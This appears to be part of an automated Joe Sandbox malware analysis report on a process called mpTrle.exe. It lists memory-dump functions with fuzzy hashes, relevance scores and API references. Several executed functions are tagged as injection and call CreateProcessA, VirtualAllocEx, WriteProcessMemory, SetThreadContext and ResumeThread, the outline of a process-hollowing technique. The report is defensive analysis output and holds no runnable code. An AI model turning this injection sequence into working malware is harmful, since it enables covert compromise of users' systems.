Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 771d57e6d09ca8052b948a42693f56d63ef43f8277f9ea6f4377ad091dbc416e
Instruction ID: eb5a6232740bd4b70cd5626de86a8342831ce0e1c12acf49fdc708dcdafe0fff
Opcode Fuzzy Hash: 771d57e6d09ca8052b948a42693f56d63ef43f8277f9ea6f4377ad091dbc416e
Instruction Fuzzy Hash: 8741A170A0121ACFDF11DFA5D85469EBBB2FF89350F24492AE405DB340DF74A882CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00820012 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b3dd80c2ed3178650ccd9661f87301e09628e857cef5652163f6ee992a12db
Instruction ID: df78ef0d14476012a49b19ab0b925157adf28c70ef62a456192aec778c45bd14
Opcode Fuzzy Hash: 63b3dd80c2ed3178650ccd9661f87301e09628e857cef5652163f6ee992a12db
Instruction Fuzzy Hash: 0421D371A057688FDB15DB78D8906DEBBB1FF8A300F1485ABD405EB242DB319941CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00820E80 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58a41b255af6f97fdbdab45bae58e74961d870b611626a1420b70a5a0ca81eb6
Instruction ID: 01c8ca77c8af4de077e84a5418792d6b4002ac5e3b6d895c319c4e76194287ab
Opcode Fuzzy Hash: 58a41b255af6f97fdbdab45bae58e74961d870b611626a1420b70a5a0ca81eb6
Instruction Fuzzy Hash: 1E215C75A006189FDB10DF69E981AAEBBF1FF88310F148065E905EB391DB35E841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00820E90 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e7ab3a2a3b0f31d27284034b9a5601f2caddfd28e825e0df8440061c1830fb4
Instruction ID: 2465443976c7f42fde701905e49adcf2ce925d10aaa4977ad831e8638c9aa1ad
Opcode Fuzzy Hash: 3e7ab3a2a3b0f31d27284034b9a5601f2caddfd28e825e0df8440061c1830fb4
Instruction Fuzzy Hash: CA213D75A006189FDB10DF69D981AAEBBF1FB88310F144065E905E7391EB35ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 000DD030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655081309.00000000000DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dd000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ec65ea3beb0302323491fd7a4a8bf35d526ef9dc2aee1c27bbb7fbbbadc3a9c
Instruction ID: 81d126b8f70d03effb66dd76e27a11f775f175ae624bceb8e631d9eb608c74b4
Opcode Fuzzy Hash: 7ec65ea3beb0302323491fd7a4a8bf35d526ef9dc2aee1c27bbb7fbbbadc3a9c
Instruction Fuzzy Hash: AB21AF75604340DFEB24DF54D984B26BFA5EB84314F34C66BE9494A346C336D846CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 000DD006 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655081309.00000000000DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dd000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c1292cf0fe8057a1834f816d8bba88d43a58e4998332101d00e58d69f912f08
Instruction ID: 206100595ce462d38f2eeb93da73873a7876fb63c841258ffb3fec57b12fa2e7
Opcode Fuzzy Hash: 4c1292cf0fe8057a1834f816d8bba88d43a58e4998332101d00e58d69f912f08
Instruction Fuzzy Hash: AD214B755093809FC7128F24D994711BFB1EB46214F29C5DBD8858B2A7C23A985ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00821CD4 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9e05682377d9b3c2ceb2ce764f01ada33d73a30f8e153f9c3a95e44614d76e7
Instruction ID: 20896646b0e9902663f69f81b84c2c18e6203b5835c70d05273ea0a306a934b1
Opcode Fuzzy Hash: b9e05682377d9b3c2ceb2ce764f01ada33d73a30f8e153f9c3a95e44614d76e7
Instruction Fuzzy Hash: 8221B131B001289FDF04EB69E55879EBBB2FB94310F64847AE405EB384DB31ED818B90

Uniqueness

Uniqueness Score: -1.00%

Function 008225F2 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac700313d3b1fea0404a415e010474b6981c3192bc31b71a1164e96c69d5be14
Instruction ID: 54ccda9fa2c1991130ed64d8144770e81c735e1ae4a549af2fce9cec35f690b9
Opcode Fuzzy Hash: ac700313d3b1fea0404a415e010474b6981c3192bc31b71a1164e96c69d5be14
Instruction Fuzzy Hash: B121ED34A00219DFDB10EFA4EA85AAEBBB2FF48305F648155D805EB259D771AC92CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00820FA0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9296eda09cde54744434bcd0bc6104b6e62dd7e94b93a49db8643399bedbaa63
Instruction ID: 070935f47124b8266eae8eb6b9e323e368ac0427b435e2780ae95b227b65898b
Opcode Fuzzy Hash: 9296eda09cde54744434bcd0bc6104b6e62dd7e94b93a49db8643399bedbaa63
Instruction Fuzzy Hash: 99116131B005288FDF149A79D8196AE77AAFBD8311B10453AE40AE7384EE75EC468BD1

Uniqueness

Uniqueness Score: -1.00%

Function 008211D8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 230b0827cbf70228bc8bbf115b8c45b275b71dcf08f64503ed73f0aa99a55868
Instruction ID: 41427a9404c0e78d365d3ea2f3070b7bc7c091692a1b3ba21f2dc1c2bf8181ce
Opcode Fuzzy Hash: 230b0827cbf70228bc8bbf115b8c45b275b71dcf08f64503ed73f0aa99a55868
Instruction Fuzzy Hash: ED0192317041604BDB11DBBDE85876BB7DAEBD5710F24842AF109C7386DA65EC428791

Uniqueness

Uniqueness Score: -1.00%

Function 00829D87 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ed0665b2945a4471746a4ff46c2dd82ead273e24abe1712c3268ab5c7976de7
Instruction ID: c143fcb7b18368fb2a406c7581e76b7769a2e0691b7694217cb9e6fba70223f0
Opcode Fuzzy Hash: 9ed0665b2945a4471746a4ff46c2dd82ead273e24abe1712c3268ab5c7976de7
Instruction Fuzzy Hash: 7901A235B041200FDB21DA7DA865B6E67D6EBC5720F11883EF54ACB380DE65DC438781

Uniqueness

Uniqueness Score: -1.00%

Function 008252F0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7586e498ebced2a0445b21400b96ab371728e1dcb805c4cc9c1d8e3c8d7d0bc
Instruction ID: 018d5ac67aa9e4e2d9d726cef176beae3080448c35c74682d617bd7f8b6da535
Opcode Fuzzy Hash: b7586e498ebced2a0445b21400b96ab371728e1dcb805c4cc9c1d8e3c8d7d0bc
Instruction Fuzzy Hash: 4201DF307109244FE711EB7CE958B2E77E2FB8A350F10986AE14ECB360DA34EC428791

Uniqueness

Uniqueness Score: -1.00%

Function 00820C60 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2762b046aeff14c35481777db9b6fcd98ad3241ac5824c00becf09cb655b6314
Instruction ID: 002ca55030d7bbbf67345707c14de76af28d2395fdb8c668960e324aba2549e5
Opcode Fuzzy Hash: 2762b046aeff14c35481777db9b6fcd98ad3241ac5824c00becf09cb655b6314
Instruction Fuzzy Hash: 3C11B3B1D012199FDB00CF9AD984ADEFFB4FB49354F50852AE918B7210C374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 008211E8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cb896194fc987fe4f229d9e7e31f809aa0a28b661c3b7e76ffd6806e8ac432a
Instruction ID: 225d0aac90b487b92d7ca09267859aad25ae8dfa203887d4bd097a923f3cd195
Opcode Fuzzy Hash: 5cb896194fc987fe4f229d9e7e31f809aa0a28b661c3b7e76ffd6806e8ac432a
Instruction Fuzzy Hash: 62014B317001248BDB24DABEE41976BA2DAEBE9710F24883AF10AC7385DD65EC428391

Uniqueness

Uniqueness Score: -1.00%

Function 00829D98 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed7346f63c3828f9e935a8298e2658fb3d475b240ed4f9a714a5b5bceaae83cd
Instruction ID: 9d95faff938a8981c29ebdedac141c7786d7d1e152669e4a360d26ac3124863d
Opcode Fuzzy Hash: ed7346f63c3828f9e935a8298e2658fb3d475b240ed4f9a714a5b5bceaae83cd
Instruction Fuzzy Hash: 1D01A4357001200BDB24EA7DA45472E63DAE7C9720F10883AF54EC7384DE65EC428381

Uniqueness

Uniqueness Score: -1.00%

Function 00825300 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 461cb7decbea31b9ef8e1ce6db4b151047d11cbef63e1fb4536985d20bbd66b1
Instruction ID: 77873c0163a290d94c09e1e54c4885da27a499c749d57708b96fc0298d8817f3
Opcode Fuzzy Hash: 461cb7decbea31b9ef8e1ce6db4b151047d11cbef63e1fb4536985d20bbd66b1
Instruction Fuzzy Hash: 410181317109244BE710EA7DE459B2E73D5FBCA750F10983AE50ECB344DE65EC428781

Uniqueness

Uniqueness Score: -1.00%

Function 008232A0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78f90349091dfe2ef7ecd54201c521277206cc214c3df628121cdb6008a40d72
Instruction ID: 55c6f08320abaeddc56d0601f50878406a5a2dd5d55681359ca9b290acbf37b8
Opcode Fuzzy Hash: 78f90349091dfe2ef7ecd54201c521277206cc214c3df628121cdb6008a40d72
Instruction Fuzzy Hash: 2DF05E35A08628DFDF24CE44F9692EC77A0FB50316F2944A1D901D7294D7789BC2C750

Uniqueness

Uniqueness Score: -1.00%

Function 00825F10 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b00c69d4e89f1f5e330bcbed1781b65ac57f8cf4c8ff2dfa5141b1e956416ae
Instruction ID: 7686d9c17007765284c8f552308aff704193df5c6787717367eacffd05cadc60
Opcode Fuzzy Hash: 3b00c69d4e89f1f5e330bcbed1781b65ac57f8cf4c8ff2dfa5141b1e956416ae
Instruction Fuzzy Hash: 4BE09232E0022857DF2096A8D84458EBBA9E785761F00057AE909E7200D931DC4582D1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00823DBE Relevance: 5.2, Strings: 4, Instructions: 210COMMON

Download Yara Rule

Strings

\>_, xrefs: 00823FD4
|=_, xrefs: 00823DFB
(9_, xrefs: 00824060
(9_, xrefs: 008240D5

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID: (9_$(9_$\>_$|=_
API String ID: 0-1534950688
Opcode ID: 3fc207e5eaaf2b754e430efa34f22cd3d301d61bc8df0f6196f153fe23e90e02
Instruction ID: f002b13e56b6b540625f63c7bc5872d9fc9356ffc4e26a9162be2ef080e8e334
Opcode Fuzzy Hash: 3fc207e5eaaf2b754e430efa34f22cd3d301d61bc8df0f6196f153fe23e90e02
Instruction Fuzzy Hash: 9B912D30A006298FDB14DF64D994B9DBBB2FF88300F118699D509AB355DB74EE86CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00829E20 Relevance: 5.2, Strings: 4, Instructions: 205COMMON

Download Yara Rule

Strings

4p_, xrefs: 00829F7C
q_, xrefs: 00829FC3
q_, xrefs: 0082A067
4r_, xrefs: 00829F1D

Memory Dump Source

Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_820000_html.jbxd

Similarity

API ID:
String ID: q_$ q_$4p_$4r_
API String ID: 0-1440290909
Opcode ID: d8997191b749d9b9df886dcf0af7aba10e9fe4f9445f70e016619fc17a4d4bc5
Instruction ID: db740669e991d5cc737788f1bbfc94f3a24e5c5a12e3ba2f7047ed1480a92566
Opcode Fuzzy Hash: d8997191b749d9b9df886dcf0af7aba10e9fe4f9445f70e016619fc17a4d4bc5
Instruction Fuzzy Hash: 6A716231A0071ACBDB14CFA5D4446AEBBF2FF88314F24866AD405EB345EB74E985CB81

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mpTrle.exePID: 3484, Parent PID: 1244COMMON

Execution Graph

Execution Coverage:	14%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	121
Total number of Limit Nodes:	1

Executed Functions

Function 00C00040 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C00307

Memory Dump Source

Source File: 0000000B.00000002.421574498.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c00000_mpTrle.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d918a6298f53d23195c7f0f88b1bb7b684c5d97eeda40d5a0d48b166bb0aa0f8
Instruction ID: 351f86387d26197bc9f51e909cbbb374c57efb9a8a958accc84b8078a0e75255
Opcode Fuzzy Hash: d918a6298f53d23195c7f0f88b1bb7b684c5d97eeda40d5a0d48b166bb0aa0f8
Instruction Fuzzy Hash: 18C126B0D002298FDF20CFA4C845BEEBBB1BB49300F1095AAD519B7280DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0025F7D9 Relevance: 1.6, APIs: 1, Instructions: 119
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F8B3

Memory Dump Source

Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 55a3ad165b9ca59f5ff0ca548391ec9fe3594e6635141dbe6a20b86a552365f2
Instruction ID: 827cd44225fe86fbf6b1e7bc520a1901a6aaefae3df05cd01729d3405505cf29
Opcode Fuzzy Hash: 55a3ad165b9ca59f5ff0ca548391ec9fe3594e6635141dbe6a20b86a552365f2
Instruction Fuzzy Hash: EC41AAB4D012489FCF00CFA9D984AEEBBF1BF49310F20942AE814BB210D335AA55CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0025F7E0 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F8B3

Memory Dump Source

Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: de2f17acc134f1e8854aa3d9fbb5a8c5ee61157869b20557bb445374cba0ce64
Instruction ID: 6b8bed9fe7e4b4204f293d8ad0d554b694842ecd50361cda05e677c00f9d2aad
Opcode Fuzzy Hash: de2f17acc134f1e8854aa3d9fbb5a8c5ee61157869b20557bb445374cba0ce64
Instruction Fuzzy Hash: FB41ABB5D012589FDF00CFA9D984AEEBBF1BB49310F20942AE814BB210D335AA55CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0025F938 Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F9F2

Memory Dump Source

Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e50c2f0664e4c692ea3dbc7b6abda195775b8d05a84de29c68bf29644ab1d9de
Instruction ID: 5ebfc0ab9ecc6943f7e1454bf8a9b1320eaa5893c2ebe0ffce2e79639c5dfc55
Opcode Fuzzy Hash: e50c2f0664e4c692ea3dbc7b6abda195775b8d05a84de29c68bf29644ab1d9de
Instruction Fuzzy Hash: 8741A9B8D002589FCF10CFA9D984AEEFBB1BF49310F20942AE814B7210D775A955DF69

Uniqueness

Uniqueness Score: -1.00%

Function 0025F940 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F9F2

Memory Dump Source

Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d48b4b156c6ba28d06b82d8dd901eaf00c1cf69ddc655ea208bf698168a6f5e4
Instruction ID: 8ac17e2ea1022450c9385330fd0cf94b803718ee242699eae42f82b3f43a23c8
Opcode Fuzzy Hash: d48b4b156c6ba28d06b82d8dd901eaf00c1cf69ddc655ea208bf698168a6f5e4
Instruction Fuzzy Hash: 7D4199B4D00258DFCF10CFA9D984AEEFBB1BB49310F20942AE814BB210D775A955DF69

Uniqueness

Uniqueness Score: -1.00%

Function 0025F6B0 Relevance: 1.6, APIs: 1, Instructions: 105
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025F762

Memory Dump Source

Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7638d8e6f9d9cff8eb96267051a8bb45c449d08dcba9eb98ebd97f5e7de32077
Instruction ID: c5a769833f1aa6329240872cfb6cd30ca2e42a3505d38d0b9f7bc4f6a1108ca3
Opcode Fuzzy Hash: 7638d8e6f9d9cff8eb96267051a8bb45c449d08dcba9eb98ebd97f5e7de32077
Instruction Fuzzy Hash: 9C418AB8D002589FCF10CFA9D984AEEFBB1BF49310F20942AE815BB210D775A916CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0025F6B8 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025F762

Memory Dump Source

Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: aec2d5bd80f559f5a6e1a77e3bec6ab4453b6e3e20507df3645e531257ac47c0
Instruction ID: 7b9fad3c4e73d9c7ee46c6b283df2aff0bb25d7bcb97fbd703c6fcb09bf28f96
Opcode Fuzzy Hash: aec2d5bd80f559f5a6e1a77e3bec6ab4453b6e3e20507df3645e531257ac47c0
Instruction Fuzzy Hash: 84418AB8D002589FCF10CFA9D984ADEFBB5AB49310F20942AE814BB210D775A915CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0025F581 Relevance: 1.6, APIs: 1, Instructions: 97
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0025F637

Memory Dump Source

Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6ef162eac7777603c560356c6dd990502e530af2290e0938dc0ff9000a0ff685
Instruction ID: 6886183d957e62a1cbeb2f9c851071328ba3646ee5ec86f82d3ddf209f9c9095
Opcode Fuzzy Hash: 6ef162eac7777603c560356c6dd990502e530af2290e0938dc0ff9000a0ff685
Instruction Fuzzy Hash: 3541DCB4D102589FDF10CFA9D984AEEFBB1BF49310F24842AE814B7250C739A949CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0025F588 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0025F637

Memory Dump Source

Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ecdb4b4888815ae1bd92384e4bfd416c8180a0d81bbd3e401116373673f3d561
Instruction ID: 027e909512fed5294648b0c89648868fdc575a50c2289191384de860c729c7e4
Opcode Fuzzy Hash: ecdb4b4888815ae1bd92384e4bfd416c8180a0d81bbd3e401116373673f3d561
Instruction Fuzzy Hash: DB41BCB4D102589FDB10CFA9D984AEEBBB5AB49310F24842AE814B7250D739A949CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0025EC20 Relevance: 1.6, APIs: 1, Instructions: 78
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 0025ECA6

Memory Dump Source

Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 30c7c6df18a51cad4cbe07b7c2c9f7085ecd2cd8ae58e421be49d9a71061dbb4
Instruction ID: 2d424eb0a8275a5a02f4d457ec6e74a3ccb211614089408cfed19dfb0cc71236
Opcode Fuzzy Hash: 30c7c6df18a51cad4cbe07b7c2c9f7085ecd2cd8ae58e421be49d9a71061dbb4
Instruction Fuzzy Hash: 0431CCB4D102189FDF14CFA9D984ADEFBB5EF49310F24942AE814BB250C735A905CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0025EC28 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0025ECA6

Memory Dump Source

Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5a01ef5c6cd51ed4388c127976848bc3cddf32d1336e31863bf69f5b3f0681a4
Instruction ID: a5764cc750a978e9f433c3a4509e11c3fe6285cc58a035a923ddeb856ff8e333
Opcode Fuzzy Hash: 5a01ef5c6cd51ed4388c127976848bc3cddf32d1336e31863bf69f5b3f0681a4
Instruction Fuzzy Hash: 9131B9B4D102189FDF14CFA9D984AEEFBB5EB89310F24942AE814B7310D735A905CF99

Uniqueness

Uniqueness Score: -1.00%

Function 041DD0E8 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4a480f66c6e3834d77545d77ca28bab71be6cec2afc164cc0724f236431991
Instruction ID: cbd88f06192f9292f473cd92ad7a3e2e2fde261cd65217d717282eb79f33f49d
Opcode Fuzzy Hash: 0b4a480f66c6e3834d77545d77ca28bab71be6cec2afc164cc0724f236431991
Instruction Fuzzy Hash: 2D61B2B4E052198FDB08CFA5D984AEEBBB6FF89300F10912AD419AB355DB34A945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 041D87F8 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f4a4cbd3828b4d884e3312b3f92e99cee7ae530b1956523f1d5d09d0d06651
Instruction ID: 25f0764ed9137a85b75d6154d80a529400a0c39dff58eb3a803e1c1cbfb0ddef
Opcode Fuzzy Hash: f5f4a4cbd3828b4d884e3312b3f92e99cee7ae530b1956523f1d5d09d0d06651
